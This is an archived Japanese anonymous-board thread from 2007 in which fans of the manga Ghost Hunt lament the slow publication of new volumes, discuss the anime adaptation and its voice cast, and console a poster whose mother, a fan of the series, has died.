341 :花と名無しさん:2007/01/17(水) 20:10:00 ID:???0
漫画が最終巻まで発行される目途が立ってから
ちゃんとラストまで入れてアニメ化すれば良かったのになぁ

342 :花と名無しさん:2007/01/18(木) 00:46:52 ID:???0
アニメ見てないから詳しい事は知らんが
おコブ様までって中途半端だなぁ
あと一遍で一応終わるのに

そしてアニメに負けないように漫画が出てくれれば
超サイコー

343 :花と名無しさん:2007/01/18(木) 01:21:28 ID:???0
原作の新装版が出ないのも、漫画から入った人がネタバレにならないように、
ということではないかというウワサもあるくらいだから、漫画が先に進まないと
アニメにもならないのじゃないかなあ。
だから、漫画の続きを…!今年中にでてほしいところだなあ。
この間、本屋でゴーストハント買う父娘連れを見たところだし。
あのアニメもちゃんとタゲ?と思われる読者を増やしたわけだし。
中途半端はやめてほしいやね。
そして早いとこゴーストハント終わらせて、いなださんにオリジナルも描いて欲しい。


344 :花と名無しさん:2007/01/18(木) 01:27:24 ID:???0
その噂本当だったらいいなあ…

345 :花と名無しさん:2007/01/18(木) 01:40:44 ID:???0
どっちにしろ今の刊行ペースだと年単位で先の話になりそうだよなぁ…

346 :花と名無しさん:2007/01/18(木) 02:51:04 ID:???0
死ぬまでには読みたいなぁ・・・

347 :花と名無しさん:2007/01/18(木) 03:14:50 ID:???O
あえてアニメは続きが気になる終わり方(悪く言えば中途半端)にして
終了後、興味が薄れる前に完結編スタートとして最新巻を発売
アニメから入った結末を知りたい人に、コミクスへと強制的に流れてもらう
…なーんて、そんな考えだったりしてw

348 :花と名無しさん:2007/01/18(木) 14:46:58 ID:???0
昔は「GHのコミックスは半年に一冊のペース」だって
書いてあったのに…なあ…

349 :花と名無しさん:2007/01/18(木) 15:54:25 ID:???0
最終巻が出る頃は○○歳か…と考えていた時期が俺にも有りました

350 :花と名無しさん:2007/01/18(木) 16:22:13 ID:???0
原作あるのになんでこんな遅いのか不思議だな

351 :花と名無しさん:2007/01/18(木) 17:36:06 ID:???O
>>349
自分が計算した時は、今年あたり完結予定だった

今の状況を当時の自分に教えてやりたい

352 :351:2007/01/18(木) 17:56:03 ID:???O
ごめん、間違えた

自分が計算した時は、刊行ペースが遅れ始めた頃で
それでも今頃は終わってる計算だった。

ということで

353 :花と名無しさん:2007/01/18(木) 19:04:09 ID:???0
>>346
。・゚・(ノД`)ノシ・゚・。

354 :花と名無しさん:2007/01/18(木) 20:44:23 ID:???0
次回から半年ペース刊行になりますって書いてあったのが5巻だったんだっけ
>>15見ると実際に半年で出たのは6巻から7巻の間だけなのか…
浦戸の話だったからちゃんと半年で続き出て良かったw
でも2004と2005の空白が長すぎたね…orz

355 :花と名無しさん:2007/01/18(木) 20:51:03 ID:???0
ゴーストハントを愛読してた母が先週なくなりました。
仏事にあまり詳しくないのですが、新刊が出たら仏壇に供えるのとお墓に供えるの、どちらが
母に届くのでしょうか。

356 :花と名無しさん:2007/01/18(木) 22:27:08 ID:???0
>>355
私も詳しくはないが、位牌は亡くなった方の代わり?なので
仏壇に供えたほうが良いかも

お墓に供えたら知らん奴に持ってかれるか
雨風に晒されて酷い事になるぞ

357 :花と名無しさん:2007/01/18(木) 22:47:06 ID:???0
位牌はあくまで亡くなった人の出張所であり仮のもの
だからわざわざお墓参りに行くのだ

と思っていた
適当だが

358 :花と名無しさん:2007/01/18(木) 23:37:30 ID:???0
焼いちゃってもいいんなら、お寺に頼んで
お焚きあげ供養と言うのもあるね

あと、お墓に本のお供えしてあるの見た事ある

359 :花と名無しさん:2007/01/19(金) 00:07:32 ID:???0
みなさん、ありがとうございました。供養のことは新刊出てから心配しろって話ですが。
いまでも9巻出たときのうれしそうな顔を思い出します。
退院したら見るからアニメも録っておいてねと言ってました。
平均寿命まで20年以上残ってましたが、ガンには勝てませんでした。
新刊がでたら母用と自分用に2冊買うことにします。

360 :花と名無しさん:2007/01/19(金) 00:50:16 ID:???0
嘘だといってくれ・・・壮大な釣りだって、、、

361 :花と名無しさん:2007/01/19(金) 01:07:52 ID:???0
浦戸とおこぶ様の巻を読み直してぞくぞくしてたなあと思ってたら
風邪ひいてたよ

362 :花と名無しさん:2007/01/20(土) 00:21:04 ID:???0
>>299
ttp://shop.kodansha.jp/bc/comics/kc/girl_02.html#x

363 :花と名無しさん:2007/01/20(土) 00:39:32 ID:???0
おこぶさままでやらないと、綾子が可哀想。

で、続きはOVAですか?

364 :花と名無しさん:2007/01/20(土) 01:10:39 ID:???0
>>359
お悔やみ申し上げます
私も早く新刊が出るように心から祈ります

365 :花と名無しさん:2007/01/20(土) 01:17:09 ID:???0
そだ。漫画読んでたら綾子がアニメボイスで再生された。
他のメンバーはもともと自分の中の声なんだけど
綾子だけは。

366 :花と名無しさん:2007/01/20(土) 04:10:23 ID:???0
そういえば、好きな漫画のアニメ化に毎回ある声の違和感、GHでは感じなかったな。

367 :花と名無しさん:2007/01/20(土) 13:56:00 ID:???0
ナルは読むときはどうしても塩沢声を脳内で再生してしまう
別にアニメを見てるときには違和感感じないんだけど
紙面を読むときとは何かが脳内で切り替わるのかもしれない

368 :花と名無しさん:2007/01/20(土) 16:52:32 ID:???0
塩沢さんも逝ってしまわれたな

369 :花と名無しさん:2007/01/21(日) 12:38:19 ID:???0
最後の仕事は人間に扮した化け物の役だったね、塩沢さん

370 :花と名無しさん:2007/01/21(日) 15:06:37 ID:???0
ぶりぶりざえもんすら、塩沢さんの代わりは......

371 :花と名無しさん:2007/01/21(日) 15:23:07 ID:???0
ナルが塩沢さんのイメージってのはどうもピンとこなかった
塩沢さんの喋りってクセがあるけどナルの喋りはさらっとしてそうだから。

372 :花と名無しさん:2007/01/21(日) 18:42:00 ID:???0
ドラマCDの岡野さんは割とイメージ合ってたと思う。

373 :花と名無しさん:2007/01/22(月) 17:29:23 ID:???0
塩沢さんの遺影は白鳥刑事でした。

374 :花と名無しさん:2007/01/22(月) 17:51:05 ID:???0
まじでー

375 :花と名無しさん:2007/01/22(月) 20:46:44 ID:???0
>>374
マジだよ。お葬式行ったから。
勿論アニメ絵と並べてご本人の写真も飾られてたよ。念のため。

他の人、関係ない話続けちゃってごめん。
でももし塩沢さん存命だったらナルやって欲しかったね。

376 :花と名無しさん:2007/01/22(月) 20:55:25 ID:???0
塩沢さんは暗黒タマタマの次男の時がすっげー好きだw
ラベンダー見たさに何回も見たけど、未だに飽きない。

377 :花と名無しさん:2007/01/22(月) 20:58:19 ID:???0
ムゥの印象しかない自分w

378 :花と名無しさん:2007/01/22(月) 21:07:56 ID:???0
>>371
あー自分も塩沢さんと言われてピンと来なかったクチだ。
高校生の役でもギャグっぽいキャラのイメージが強いのと、
あとは大人キャラの役のイメージしか自分の中にないから
ナルを塩沢さんで想像できない感じ

379 :花と名無しさん:2007/01/22(月) 21:53:40 ID:???0
おまいら塩沢さんといえばクラヴィス様だろ

380 :花と名無しさん:2007/01/22(月) 22:00:26 ID:???0
ネオロマ興味ねえ

381 :花と名無しさん:2007/01/22(月) 22:05:16 ID:???0
塩沢さんにも興味ない

382 :花と名無しさん:2007/01/22(月) 23:31:04 ID:???0
オーベルシュタインとR田中一郎でどうナルを想像するのか難しかったorz
でもR君が世界征服に燃えたときのシリアス系のしゃべりならまだなんとかいけるw

383 :花と名無しさん:2007/01/23(火) 01:54:34 ID:???0
ブラスターキッドのシリアス系のしゃべりで……
ごめん、誰も知らないよね

384 :花と名無しさん:2007/01/23(火) 05:13:21 ID:???0
J9J9情け無用、ですな

でも、いまのアニメの声優さんの声も割と
いいと思うな。

385 :花と名無しさん:2007/01/23(火) 11:34:22 ID:???0
おこぶさまつづきはまだですか

386 :花と名無しさん:2007/01/23(火) 11:54:52 ID:???O
文庫版5巻て、おこぶさま?
書き下ろしページとかあるかなあ。
おこぶさまデザイン秘話みたいなのw

387 :花と名無しさん:2007/01/23(火) 14:18:37 ID:???O
今の声優さん、良いよね。
アニメ開始前は知らない人ばっかりで不安だったけど、
今はほとんど違和感ないよ。

388 :花と名無しさん:2007/01/23(火) 19:56:55 ID:???0
ぼーさんとリン以外は満足。
ぼーさんの中の人の声もけっこう好きだけどどうも演技に幅がなくてなー。
リンはもっと陰気で声の低いイメージがあったんでイケメン声でなんかワロスw

389 :花と名無しさん:2007/01/23(火) 21:54:18 ID:???0
ジョンはアタリだったと思う

390 :花と名無しさん:2007/01/23(火) 22:29:31 ID:???0
DVDのオマケ4コマ楽しみ。
コレのためにKCの原稿が進まないのかな…いなだ先生

391 :花と名無しさん:2007/01/23(火) 22:40:10 ID:???0
これのためにってレベルじゃないぐらい原稿は遅れてるから関係ないと思うが

392 :???0:2007/01/23(火) 23:35:46 ID:???O
DVD今日きた。4コマは黒田さんが・・・

393 :花と名無しさん:2007/01/23(火) 23:37:10 ID:???O
明日メイツに買いに行くんだから、それ以上言うなよ!
絶対に言うなよ!

394 :花と名無しさん:2007/01/24(水) 19:05:14 ID:???0
なんと、四コマの特典がつくのか
買おうかな、今からジャムりか

395 :花と名無しさん:2007/01/24(水) 19:17:23 ID:???O
まだあきらめるには早いよ。

396 :花と名無しさん:2007/01/24(水) 20:15:36 ID:???0
本編が読みたいので4コマもいいが頑張って欲しい

397 :花と名無しさん:2007/01/24(水) 20:24:37 ID:???0
春までには10巻がいつ頃発行されるかの情報が出ると良いな
9巻が出るまで2年以上かかったけど10巻出るまでまたあと一年待つのはキツイ…

398 :花と名無しさん:2007/01/24(水) 22:29:19 ID:???0
緑稜のが終わるタイミングで文庫5巻を出すって事は、
偶然ではない気がしているのだけども。
つまり、もしかしたらアニメと連動したタイミングで(・∇・)?

399 :花と名無しさん:2007/01/24(水) 22:32:28 ID:???0
年末フライングがあっただけに期待するのが怖いよ

400 :花と名無しさん:2007/01/24(水) 22:35:22 ID:???0
アニメ終了合わせで新刊となるとそろそろ発表があっても良い頃だと思うんだが
来月辺り発表されるだろうか…!(*゚∀゚)=3

でもあまり期待はしないでおこう。出なかった時つらいから

401 :花と名無しさん:2007/01/25(木) 01:49:54 ID:???O
アニメ板のゴーストハントスレ落ちてる?

402 :花と名無しさん:2007/01/25(木) 01:57:25 ID:???0
毎月発売されるDVDに毎月描き下ろしがつくなら
あと8ヶ月は我慢できる

403 :花と名無しさん:2007/01/25(木) 02:24:16 ID:???0
>>401
鯖移転中。そのうち復活するからマターリ待機しるヽ(´ー`)ノ

74 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)